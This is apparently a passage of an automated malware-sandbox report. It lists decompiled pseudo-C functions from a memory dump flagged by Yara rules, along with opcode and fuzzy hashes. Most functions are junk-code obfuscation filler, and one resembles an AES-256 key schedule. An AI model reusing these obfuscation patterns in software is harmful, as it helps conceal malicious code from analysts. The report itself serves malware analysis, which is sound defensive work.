                                    						 *0xaf6b0bec =  *0xaf6b0bec >> 0x8e;
                                    						asm("rcl dword [0x8386a03], 0x8e");
                                    						asm("rol dword [0xcc6ead35], 0x38");
                                    						_pop(_t102);
                                    						asm("adc edx, [0x405ae539]");
                                    						_t50 = _t50 +  *0x4b726635;
                                    						 *0x69391c7 =  *0x69391c7 << 0xa2;
                                    						_t95 = _t102 ^ 0x363591d6;
                                    						asm("sbb edx, 0xbd2bc0d5");
                                    						_t79 = (_t79 | 0x0dfaf7c5 |  *0x2e3d97f7) ^  *0xd97fccb8;
                                    						_t41 = 0x29418436;
                                    						 *0x4f4ff9c1 =  *0x4f4ff9c1 & 0x5df4c40f;
                                    					} while ( *0x4f4ff9c1 > 0);
                                    					asm("adc ebp, [0x94b541c4]");
                                    					_t95 = _t95 ^ 0x94e5ac11;
                                    					 *0xe0f6db8d =  *0xe0f6db8d >> 0x4c;
                                    					asm("sbb ebp, [0x170760f5]");
                                    					 *0x62978fc2 =  *0x62978fc2 - _t65;
                                    					_push(_t79);
                                    					 *0x9a9cfc01 = _t74;
                                    					_t79 = _t79 +  *0x4d79ef4;
                                    					asm("adc [0x25441d2b], edi");
                                    					_t70 =  *0xc5212a69 * 0x9f;
                                    					asm("adc ebx, [0xb9ebefc4]");
                                    					_t65 = _t65 |  *0xabf5f897;
                                    					asm("rcl byte [0x2bd6d1f6], 0x7a");
                                    					_t74 =  *0x9a9cfc01 ^ 0xa51d879a;
                                    					_t41 = 0x29418437;
                                    				} while (0xbdc58c35 >= 0);
                                    				 *0xc61f37c8 =  *0xc61f37c8 << 0x32;
                                    				L1();
                                    				 *0x626221e8 = _t79;
                                    				 *0xe9b5d501 =  *0xe9b5d501 ^ 0xbdc58c35;
                                    				asm("adc bl, 0xb3");
                                    				return 0x89c8d999;
                                    			}


















                                    0x0041ea35
                                    0x0041ea47
                                    0x0041ea4e
                                    0x0041ea5b
                                    0x0041ea6e
                                    0x0041ea7a
                                    0x0041ea81
                                    0x0041ea88
                                    0x0041ea8e
                                    0x0041ea94
                                    0x0041ea9a
                                    0x0041ea9b
                                    0x0041ea9b
                                    0x0041eab1
                                    0x0041eab7
                                    0x0041eabd
                                    0x0041eac4
                                    0x0041eaca
                                    0x0041ead0
                                    0x0041eadd
                                    0x0041eae3
                                    0x0041eae9
                                    0x0041eaef
                                    0x0041eaf9
                                    0x0041eb05
                                    0x0041eb11
                                    0x0041eb19
                                    0x0041eb25
                                    0x0041eb25
                                    0x0041eb41
                                    0x0041eb48
                                    0x0041eb4d
                                    0x0041eb53
                                    0x0041eb59
                                    0x0041eb62

                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e07a8342878c5e460a6ffccb814837c72114209dfacf282c137d8597fe7d35e6
                                    • Instruction ID: 535ae5cadeb9f36680de0ea1ef2ace829307583a102d6625614c620c0245ec67
                                    • Opcode Fuzzy Hash: e07a8342878c5e460a6ffccb814837c72114209dfacf282c137d8597fe7d35e6
                                    • Instruction Fuzzy Hash: 14D1CA32918395DFD306DF79E99AB823FB2F712324B08424EC9E197492D734255ACF89
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 61%
                                    			E0041D1AB(void* __eax, signed char __ebx, signed int __ecx, signed char __edx, void* __edi, signed int __esi) {
                                    				signed char _t22;
                                    				signed char _t29;
                                    				signed int _t33;
                                    				signed char _t36;
                                    				void* _t44;
                                    				signed int _t48;
                                    				intOrPtr _t52;
                                    				void* _t55;
                                    
                                    				_t48 = __esi;
                                    				_t36 = __edx;
                                    				_t33 = __ecx;
                                    				_t29 = __ebx;
                                    				_t22 = __eax + 0x18b312e3;
                                    				_push(_t55);
                                    				_t56 = _t55 +  *0x27e95ec5;
                                    				if(_t56 < 0) {
                                    					__ebp =  *0xf0988d7d * 0xf422;
                                    					__edx = __edx ^ 0x5b77bd1b;
                                    					__eflags =  *0xb03fb59c &  *0xf0988d7d * 0x0000f422;
                                    					 *0xe93148ea =  *0xe93148ea + __esi;
                                    					__edx =  *0xe4ca3116;
                                    					asm("adc edx, [0xec840716]");
                                    					__eflags = __ch -  *0x91f58a24;
                                    					asm("sbb [0x8ae5ac38], bl");
                                    					asm("sbb eax, [0xf993cb09]");
                                    					asm("sbb esp, 0x6756d20e");
                                    					asm("rcl dword [0x780b5fd3], 0xd9");
                                    					__ebx = __ebx + 1;
                                    					__eflags = __ebx;
                                    					if(__eflags == 0) {
                                    						asm("adc esi, [0xf9276c75]");
                                    						if(__eflags >= 0) {
                                    							__ebp =  *0xf9b74970;
                                    							 *0xa1e50b30 =  *0xa1e50b30 | __bh;
                                    							__eflags =  *0xa1e50b30;
                                    							asm("adc esp, 0xeb067923");
                                    							if( *0xa1e50b30 < 0) {
                                    								_t17 = __edi;
                                    								__edi =  *0xf9b74873;
                                    								 *0xf9b74873 = _t17;
                                    								 *0xfdc90e30 = __al;
                                    								__edi =  *0xf9b74873 ^  *0xd12394f5;
                                    								asm("rcr dword [0x1b9feacb], 0x64");
                                    								__esi = 0xe99993d;
                                    								asm("sbb edi, [0x9adbc19e]");
                                    								_pop(__ebp);
                                    								_push(__edi);
                                    								asm("adc [0x6ab1e7ee], ebp");
                                    								 *0x9981b3cb =  *0x9981b3cb ^ __ebp;
                                    								asm("adc [0xa9104a12], dl");
                                    								__ecx = __ecx -  *0x2316b6ea;
                                    								__eflags = __ecx;
                                    								if(__ecx < 0) {
                                    									__eax =  *0xad92df73;
                                    									__ecx = __ecx & 0x631703fe;
                                    									__eflags =  *0x123ad519 & __ebp;
                                    									 *0xcad9b4f2 =  *0xcad9b4f2 & __bl;
                                    									 *0x17bb9e32 =  *0x17bb9e32 & 0x000000b0;
                                    									__eflags =  *0x22899af2 - __bh;
                                    									asm("sbb eax, [0xf10d3ad4]");
                                    									asm("adc dh, 0x20");
                                    									__ecx = __ecx + 0xb230a1a3;
                                    									__esi = 0xe99993c;
                                    									 *0x43523b66 =  *0x43523b66 << 0xb3;
                                    									asm("sbb esi, [0x57102b0f]");
                                    									__edi = __edi + 0xd51b3719;
                                    									__dh = __dh - 0xb5;
                                    									__esi =  *0xb4c95d69 * 0x8baf;
                                    									__eflags = __cl - 0x34;
                                    									_pop(__ebp);
                                    									asm("scasd");
                                    									__eflags = __edx -  *0xd7f712d4;
                                    									__ebx = __ebx -  *0x650537cf;
                                    									__eflags = __ebx;
                                    									if(__ebx >= 0) {
                                    										__edi = 0x7f4db570;
                                    										__ecx = __ecx - 0x64c0551e;
                                    										 *0x3acc1c82 =  *0x3acc1c82 - __dh;
                                    										__ebx = __ebx - 1;
                                    										asm("rcl dword [0xfdda0794], 0x61");
                                    										__ah = __ah;
                                    										__eflags = __ebp - 0xa90febbe;
                                    										asm("rcl dword [0x4d566864], 0x10");
                                    										__ecx = __ecx &  *0xbd1817f5;
                                    										asm("ror dword [0xb427ca35], 0xe6");
                                    										 *0x747a21b =  *0x747a21b ^ __ebp;
                                    										asm("sbb [0xabbed52b], ebp");
                                    										asm("sbb cl, [0xab3c8038]");
                                    										__edi =  *0xece0b769 * 0xcb8a;
                                    										__eflags =  *0x76ffe91f - __edi;
                                    										__edx = 0x943845c1;
                                    										asm("sbb ebp, [0x53eb2fcc]");
                                    										 *0x23589f04 =  *0x23589f04 ^ __al;
                                    										__eflags =  *0x23589f04;
                                    										if( *0x23589f04 <= 0) {
                                    											__ebx =  *0xfaf4ac7f * 0xd97e;
                                    											asm("movsw");
                                    											 *0x6d0a93f2 =  *0x6d0a93f2 >> 0x12;
                                    											_pop(__ebx);
                                    											__eax = __eax ^  *0xd5898c06;
                                    											__bl = __bl -  *0x675b692c;
                                    											 *0x4438caed =  *0x4438caed >> 0xf8;
                                    											__edi = __edi |  *0x1ecd0abc;
                                    											__ch = __ch ^ 0x00000086;
                                    											__eflags = __ch;
                                    											_push(0x943845c1);
                                    											if(__ch >= 0) {
                                    												__esi = __esi +  *0xe13bb072;
                                    												__dh = 0xc9;
                                    												__eax = __eax ^ 0x65d01fdb;
                                    												__esi = __esi +  *0x41a9b501;
                                    												__eflags = __esi;
                                    												if(__esi == 0) {
                                    													asm("sbb [0x61c847b], edx");
                                    													asm("rcl dword [0xe7e5bcba], 0xd5");
                                    													_pop(__ecx);
                                    													__eflags =  *0x4eaeed29 & __ebp;
                                    												}
                                    											}
                                    										}
                                    									}
                                    								}
                                    							}
                                    						}
                                    					}
                                    				}
                                    				while(1) {
                                    					L1:
                                    					 *0x3b97609 =  *0x3b97609 & _t56;
                                    					_t36 = _t36 & 0x000000b2;
                                    					if(_t36 != 0) {
                                    						continue;
                                    					}
                                    					L2:
                                    					_pop(_t44);
                                    					 *0x9b43710d =  *0x9b43710d >> 0x59;
                                    					_t48 = (_t48 & 0xec6820a1) +  *0x8dca0c2b + 1;
                                    					asm("ror dword [0xaa6cd8fc], 0x15");
                                    					 *0x74f8a804 =  *0x74f8a804 & _t29;
                                    					 *0x5b0f1f05 = _t29;
                                    					asm("adc ecx, 0x8c0ee43d");
                                    					 *0x2bfa1939 = _t52;
                                    					 *0xed478613 = _t36 &  *0x3e5484fc & 0x610dd78c;
                                    					_t33 = _t33 ^ 0xb71d1f16 |  *0x951ec62f;
                                    					 *0xfa5521d2 =  *0xfa5521d2 << 0xea;
                                    					_t22 = _t22 + 2 &  *0x10814be3;
                                    					asm("sbb [0xf9062aa2], bl");
                                    					asm("adc bh, [0x41608722]");
                                    					_t56 = 0x7c387416;
                                    					 *0x809b9ef =  *0xed478613;
                                    					asm("adc esp, [0xf6102665]");
                                    					_t36 = _t44;
                                    					 *0x8ebbace3 =  *0x8ebbace3 << 0xae;
                                    					 *0x70a50ad7 =  *0x70a50ad7 - _t36;
                                    					_push(_t44 + 1);
                                    					_t29 =  *0x5b0f1f05 - 0x0000000a ^  *0x906b64d2;
                                    					_t52 =  *0xab99e09;
                                    					 *0xab99e09 =  *0x2bfa1939;
                                    					if(_t29 >= 0) {
                                    						while(1) {
                                    							L1:
                                    							 *0x3b97609 =  *0x3b97609 & _t56;
                                    							_t36 = _t36 & 0x000000b2;
                                    							if(_t36 != 0) {
                                    								continue;
                                    							}
                                    							goto L2;
                                    							do {
                                    								do {
                                    									do {
                                    										goto L1;
                                    									} while (_t36 != 0);
                                    									goto L2;
                                    								} while (_t29 >= 0);
                                    								goto L3;
                                    							} while (_t33 >= 0);
                                    							asm("rol byte [0x4c68f784], 0x8d");
                                    							_pop(_t22);
                                    							 *0x206342b0 =  *0x206342b0 << 0x5c;
                                    							asm("rcr byte [0x4eac7ee7], 0x86");
                                    							_t29 =  *0x91e576a * 0xa901;
                                    							_push(0x2f663016);
                                    							_t36 =  *0x5f48636b * 0x00005555 &  *0x74c95ceb;
                                    							asm("sbb ebx, [0x31369c6e]");
                                    							_t56 = (0x7c387416 &  *0xee2a260f) +  *0x50472a93;
                                    							_t48 = _t48 - 1;
                                    							if(_t48 != 0) {
                                    								continue;
                                    							} else {
                                    								asm("adc esi, [0xcdd02e7a]");
                                    								_t22 = _t22 + 0x347ded17;
                                    								if(0x2f663016 != 0) {
                                    									continue;
                                    								} else {
                                    									 *0x9048b5dd =  *0x9048b5dd >> 0x4e;
                                    									 *0xb06d5ff4 =  *0xb06d5ff4 | _t29;
                                    									 *0x591ac92e =  *0x591ac92e << 0xcc;
                                    									 *0x95d3f14 = _t36;
                                    									asm("lodsb");
                                    									 *0xfd7e63c6 =  *0xfd7e63c6 | _t22;
                                    									 *0xb5e49981 =  *0xb5e49981 + _t48 - 0x520b7c0f;
                                    									asm("sbb [0xe8fcc704], ah");
                                    									return _t22 - 0x8016fbf1;
                                    								}
                                    							}
                                    						}
                                    					}
                                    					L3:
                                    					 *0xb99f09b7 =  *0xb99f09b7 ^ _t29;
                                    					asm("adc eax, [0xf7196c7]");
                                    					 *0x1262affc =  *0x1262affc >> 0xdc;
                                    					_t33 = _t33 -  *0x1c4badca;
                                    					asm("rcr dword [0x92772366], 0x3f");
                                    					_t36 = 0x7c387416;
                                    					asm("rcr dword [0xd5227b61], 0x58");
                                    					_t22 =  *0xfd3b2b3a;
                                    					 *0xfd3b2b3a =  *0x6254f17d * 0x00009f21 |  *0x337b9033;
                                    					L1:
                                    					 *0x3b97609 =  *0x3b97609 & _t56;
                                    					_t36 = _t36 & 0x000000b2;
                                    				}
                                    			}












                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a178324f87d62f99b9b4f817c8a5d5330b14ec8093beffead70d70f378816638
                                    • Instruction ID: d0a787ef5d0c4882c84332649f04fdfaa4120ed1b5a2f0893bc2b3e180e9d69e
                                    • Opcode Fuzzy Hash: a178324f87d62f99b9b4f817c8a5d5330b14ec8093beffead70d70f378816638
                                    • Instruction Fuzzy Hash: FAA12232919791CFC711CF38C986B513FB6F392714B08024EC9A1A75D2E738666ADF89
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b956e0316292c343d49d2964b22c3e23ed7df4df4c8d472d0dabe220079171c5
                                    • Instruction ID: f7a1a914469160107eb2e4e3007130d130db9e75b8ccbba68384749c8465317b
                                    • Opcode Fuzzy Hash: b956e0316292c343d49d2964b22c3e23ed7df4df4c8d472d0dabe220079171c5
                                    • Instruction Fuzzy Hash: 1D91117298D3C1DFEB01DF28D8EA6463F71F756320709478DC4A15B2E2D36426AACB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 61%
                                    			E0041DFEC(signed int __eax, signed char __ebx, char __ecx, signed int __edi, signed int __esi, void* __eflags) {
                                    				char _v3;
                                    				signed int _t20;
                                    				void* _t21;
                                    				signed int _t22;
                                    				signed char _t26;
                                    				signed int _t28;
                                    				char _t35;
                                    				intOrPtr _t36;
                                    				signed char _t37;
                                    				signed int _t40;
                                    				signed char _t41;
                                    				signed int _t43;
                                    				signed int _t44;
                                    				void* _t46;
                                    				signed int _t51;
                                    				signed int _t54;
                                    				signed int _t58;
                                    				void* _t61;
                                    
                                    				_t61 = __eflags;
                                    				_t47 = __esi;
                                    				_t45 = __edi;
                                    				_t35 = __ecx;
                                    				_t26 = __ebx;
                                    				_t20 = __eax;
                                    				_t51 = _t58;
                                    				goto L1;
                                    				do {
                                    					do {
                                    						do {
                                    							do {
                                    								do {
                                    									do {
                                    										L1:
                                    										 *0x939ff7b7 = _t26;
                                    										asm("rol byte [0x8f83e7b0], 0xee");
                                    									} while (_t61 == 0);
                                    									asm("rcr dword [0xdc624d74], 0xa3");
                                    									_t47 = _t47 ^  *0xc419e217;
                                    									_t51 = _t51 ^ 0x84e5c4bb;
                                    								} while (_t51 != 0 ||  *0xaeb00218 >= _t35);
                                    								asm("sbb ebx, [0xe77cd173]");
                                    								asm("lodsb");
                                    								 *0x2f9d1616 =  *0x2f9d1616 << 0x43;
                                    								 *0xc1ddbd1c =  *0xc1ddbd1c + _t26;
                                    								 *0xa8e0cc32 =  *0xa8e0cc32 | _t26;
                                    								_t40 = 0xef4544a1 |  *0xc02c16ef;
                                    								_t26 = _t26 ^ 0x000000b2;
                                    								 *0xa8e0cc32 =  *0xa8e0cc32 << 0x53;
                                    								_t51 =  &_v3;
                                    								 *0xc1daa919 =  *0xc1daa919 & 0xef4544a1;
                                    								_t35 =  *0xa8e0cc32;
                                    								asm("rcl dword [0xc83916ef], 0xf7");
                                    							} while ( *0xc1daa919 != 0);
                                    							 *0x997775 =  *0x997775 << 0x43;
                                    							asm("adc dl, [0xd8a8c4a8]");
                                    							 *0xe0cc32c1 =  *0xe0cc32c1 >> 0x2b;
                                    							asm("rcr byte [0x3816efa8], 0x9d");
                                    							 *0x173a7bc8 =  *0x173a7bc8 >> 0x47;
                                    							_push(_t40);
                                    							_t21 = _t20 + 1;
                                    							_push(_t21);
                                    							_t47 = _t47 ^  *0xef45d88d;
                                    							_t41 = _t40 + 0x3a;
                                    							asm("sbb esi, [0x50405217]");
                                    							asm("sbb edi, [0xef45d88d]");
                                    							_t26 = _t26 &  *0x8b7a16ef ^  *0x81c42916;
                                    							 *0x4052173a =  *0x4052173a & _t41;
                                    							 *0xef45d88d =  *0xef45d88d ^ _t26;
                                    							_t22 = _t21;
                                    							 *0xaddd0fb4 =  *0xaddd0fb4 & _t41;
                                    							_t36 = _t35 +  *0xe7553110;
                                    							asm("rcr dword [0x453d99a1], 0xb9");
                                    							asm("adc edi, 0x1db40ffd");
                                    							asm("sbb esp, [0xe0cc3283]");
                                    							asm("adc edx, [0x6d2b16ef]");
                                    							 *0xefbe0b1c =  *0xefbe0b1c - _t36;
                                    							_t20 = _t22 & 0xffffffffe0441081;
                                    							asm("rcr byte [0x8a16efa8], 0x4c");
                                    							_t58 = _t58 &  *0x9cba1d16 &  *0xbe17ff2f;
                                    							 *0xcc32bfdd =  *0xcc32bfdd + _t26;
                                    							asm("rcr byte [0x16efa8e0], 0x50");
                                    							asm("sbb ecx, [0x2b7093ff]");
                                    							_t35 =  *0x32c5f7c6;
                                    							 *0x32c5f7c6 = _t36;
                                    							_t51 =  *0xfa34f216;
                                    							asm("adc bl, 0x4");
                                    							 *0x32b9d9b0 = _t26;
                                    							_push( *0xefa8e0cc);
                                    							asm("rcl dword [0xb3c62116], 0xe6");
                                    							 *0xd601ee67 =  *0xd601ee67 & _t51;
                                    							 *0xa2f716d2 =  *0xa2f716d2 << 0xc;
                                    						} while ( *0xa2f716d2 <= 0);
                                    						_t54 = _t51 ^  *0xe2aa9076;
                                    						_t37 = _t35 - 1;
                                    						 *0xb36b616 =  *0xb36b616 | _t54;
                                    						asm("adc bh, 0x14");
                                    						asm("rcr dword [0x32ccebb8], 0x66");
                                    						 *0xefa8e0cc =  *0xefa8e0cc >> 0x26;
                                    						 *0x8ce2a816 =  *0x8ce2a816 << 0xf0;
                                    						 *0xa8e0cc32 = 0x395f828e;
                                    						_t28 = _t26 &  *0x9e8e16ef;
                                    						 *0xd79c0126 =  *0xd79c0126 >> 0xe1;
                                    						 *0xe0cc32c1 = _t47;
                                    						 *0xba16efa8 =  *0xba16efa8 << 0x8d;
                                    						 *0xaf869af2 =  *0xaf869af2 >> 0xdb;
                                    						 *0x5fc3ccf9 =  *0x5fc3ccf9 | _t28;
                                    						 *0xab9c4208 =  *0xab9c4208 >> 0xc;
                                    						 *0x32baf2c1 =  *0x32baf2c1 & _t37;
                                    						 *0xefa8e0cc =  *0xefa8e0cc << 0x36;
                                    						_t51 = _t54 +  *0xaece9d8d &  *0x983e0416;
                                    						asm("cmpsw");
                                    						_pop(_t46);
                                    						_t20 = _t20 -  *0x16d24939;
                                    						asm("rcl byte [0x71c621c], 0xb2");
                                    						asm("movsb");
                                    						asm("ror dword [0xcc32c1db], 0x9d");
                                    						_t43 =  *0x16efa8e0;
                                    						asm("adc esp, [0x7c73a2fe]");
                                    						 *0xc4a8009a =  *0xc4a8009a >> 0x7d;
                                    						asm("sbb [0x49395fa8], ch");
                                    						 *0x947a16d2 =  *0x947a16d2 & _t37;
                                    						 *0xdec32e33 = _t58;
                                    						 *0xc16efa8 =  *0xc16efa8 + _t20;
                                    						_t45 = _t46 + 1;
                                    						asm("sbb dl, 0xa0");
                                    						asm("adc [0xccecc9b4], bl");
                                    						asm("adc cl, 0xd2");
                                    						 *0xcdc48616 =  *0xcdc48616 + _t46 + 1;
                                    						_t35 = (_t37 &  *0xc1ddbd3c) - 0x32;
                                    						_t47 = 0xefa8e0cc;
                                    						_t58 =  *0xdec32e33 -  *0x93b70016;
                                    						_t26 = ((_t28 |  *0x16d24939) &  *0xa0f4be16 & 0xe0cc32c1) - 1;
                                    					} while (_t26 < 0);
                                    					asm("adc eax, [0xaf88ac70]");
                                    					_pop(_t45);
                                    					_push(0x16d24939);
                                    					 *0x54942410 =  *0x54942410 + _t26;
                                    					 *0xaddd0fb4 =  *0xaddd0fb4 | _t26;
                                    					 *0x90e04c16 =  *0x90e04c16 | 0xefa8e0cc;
                                    				} while ( *0x90e04c16 > 0);
                                    				 *0xa8008977 =  *0xa8008977 ^ 0xefa8e0cc;
                                    				 *0x45d8a8c4 =  *0x45d8a8c4 >> 0x87;
                                    				_t44 =  *0xf9e2bc0;
                                    				 *0xf9e2bc0 = _t43;
                                    				 *0x8f16ef88 = _t35;
                                    				asm("rcl byte [0xa8c4a800], 0xcd");
                                    				asm("ror dword [0x2bbc121f], 0x79");
                                    				asm("adc edx, [0xef8840ec]");
                                    				 *0x9fe24b16 = _t51 & 0x9e3f16ef;
                                    				asm("adc edx, [0xccf0cc31]");
                                    				 *0xe0cc32c1 =  *0xe0cc32c1 ^ _t44;
                                    				 *0x6216efa8 = _t44;
                                    				 *0x9a8081e2 =  *0x9a8081e2 & _t26 +  *0x16ef45d8;
                                    				asm("adc bl, [0xa8c4a800]");
                                    				 *0x3a78d6b6 =  *0x3a78d6b6 ^ 0x16ef45d8;
                                    				 *0xef45d88d =  *0xef45d88d | _t45;
                                    				return _t20 &  *0x40ecb2a1 | 0x00000016;
                                    			}






















                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c1ae467cd16b238061e87758e33179c009ee9c89ad3846a77996a1c5d8e25dc1
                                    • Instruction ID: d1766bdbe82298faeaa42dc88495ab29ddcef1c7bff2b3fffd10119fff6109d4
                                    • Opcode Fuzzy Hash: c1ae467cd16b238061e87758e33179c009ee9c89ad3846a77996a1c5d8e25dc1
                                    • Instruction Fuzzy Hash: EE81107298D3C1CFEB01DF28D8AA6463F70F756320709078DC4A25B2D2D37426AACB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 67%
                                    			E00402D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
                                    				signed int _t66;
                                    				signed int* _t69;
                                    				signed int* _t81;
                                    				signed int _t94;
                                    				signed int _t96;
                                    				signed int _t106;
                                    				signed int _t108;
                                    				signed int* _t110;
                                    				signed int _t127;
                                    				signed int _t129;
                                    				signed int _t133;
                                    				signed int _t152;
                                    				intOrPtr _t171;
                                    
                                    				_t81 = _a12;
                                    				_t110 = _a8;
                                    				asm("ror esi, 0x8");
                                    				asm("rol eax, 0x8");
                                    				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
                                    				asm("ror edi, 0x8");
                                    				asm("rol esi, 0x8");
                                    				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
                                    				asm("ror edi, 0x8");
                                    				asm("rol esi, 0x8");
                                    				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
                                    				_t66 =  &(_t110[1]);
                                    				asm("ror edi, 0x8");
                                    				asm("rol esi, 0x8");
                                    				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
                                    				asm("ror edi, 0x8");
                                    				asm("rol esi, 0x8");
                                    				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
                                    				asm("ror edi, 0x8");
                                    				asm("rol esi, 0x8");
                                    				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
                                    				asm("ror edi, 0x8");
                                    				asm("rol esi, 0x8");
                                    				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
                                    				asm("ror esi, 0x8");
                                    				asm("rol ecx, 0x8");
                                    				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
                                    				if(_a16 != 0x100) {
                                    					L4:
                                    					return _t66 | 0xffffffff;
                                    				} else {
                                    					_t171 = _a4;
                                    					_t69 = 0;
                                    					_a12 = 0;
                                    					while(1) {
                                    						_t152 =  *(_t66 + 0x18);
                                    						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
                                    						_t127 =  *_t66 ^ _t94;
                                    						 *(_t66 + 0x1c) = _t94;
                                    						_t96 =  *(_t66 + 4) ^ _t127;
                                    						 *(_t66 + 0x20) = _t127;
                                    						_t129 =  *(_t66 + 8) ^ _t96;
                                    						 *(_t66 + 0x24) = _t96;
                                    						 *(_t66 + 0x28) = _t129;
                                    						if(_t69 == 6) {
                                    							break;
                                    						}
                                    						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
                                    						_t133 =  *(_t66 + 0x10) ^ _t106;
                                    						 *(_t66 + 0x2c) = _t106;
                                    						_t108 =  *(_t66 + 0x14) ^ _t133;
                                    						 *(_t66 + 0x34) = _t108;
                                    						_t69 =  &(_a12[0]);
                                    						 *(_t66 + 0x30) = _t133;
                                    						 *(_t66 + 0x38) = _t108 ^ _t152;
                                    						_t66 = _t66 + 0x20;
                                    						_a12 = _t69;
                                    						if(_t69 < 7) {
                                    							continue;
                                    						} else {
                                    							goto L4;
                                    						}
                                    						goto L6;
                                    					}
                                    					return 0xe;
                                    				}
                                    				L6:
                                    			}

















                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                    • Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
                                    • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                    • Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2be1b2bc641445b4b6787b6cb002965a14d6898d53cb98377d2e2ede019d7c1f
                                    • Instruction ID: 3715912791a6f78db88ad8e23f17bbc7f9d65dac392f92da923631554a8b9e93
                                    • Opcode Fuzzy Hash: 2be1b2bc641445b4b6787b6cb002965a14d6898d53cb98377d2e2ede019d7c1f
                                    • Instruction Fuzzy Hash: F53180516597F14ED30E836D08B9675AEC18E9720174EC2FEDADA6F3F3C4888408D3A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00401030(signed char* __eax) {
                                    				signed char* _t37;
                                    				unsigned int _t65;
                                    				unsigned int _t73;
                                    				unsigned int _t81;
                                    				unsigned int _t88;
                                    				signed char _t94;
                                    				signed char _t97;
                                    				signed char _t100;
                                    
                                    				_t37 = __eax;
                                    				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
                                    				_t94 = __eax[0xb];
                                    				if((_t94 & 0x00000001) != 0) {
                                    					_t65 = _t65 | 0x80000000;
                                    				}
                                    				_t37[0xc] = _t65 >> 0x18;
                                    				_t37[0xf] = _t65;
                                    				_t37[0xd] = _t65 >> 0x10;
                                    				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
                                    				_t97 = _t37[7];
                                    				_t37[0xe] = _t65 >> 8;
                                    				if((_t97 & 0x00000001) != 0) {
                                    					_t73 = _t73 | 0x80000000;
                                    				}
                                    				_t37[8] = _t73 >> 0x18;
                                    				_t37[0xb] = _t73;
                                    				_t37[9] = _t73 >> 0x10;
                                    				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
                                    				_t100 = _t37[3];
                                    				_t37[0xa] = _t73 >> 8;
                                    				if((_t100 & 0x00000001) != 0) {
                                    					_t81 = _t81 | 0x80000000;
                                    				}
                                    				_t37[4] = _t81 >> 0x18;
                                    				_t37[7] = _t81;
                                    				_t37[5] = _t81 >> 0x10;
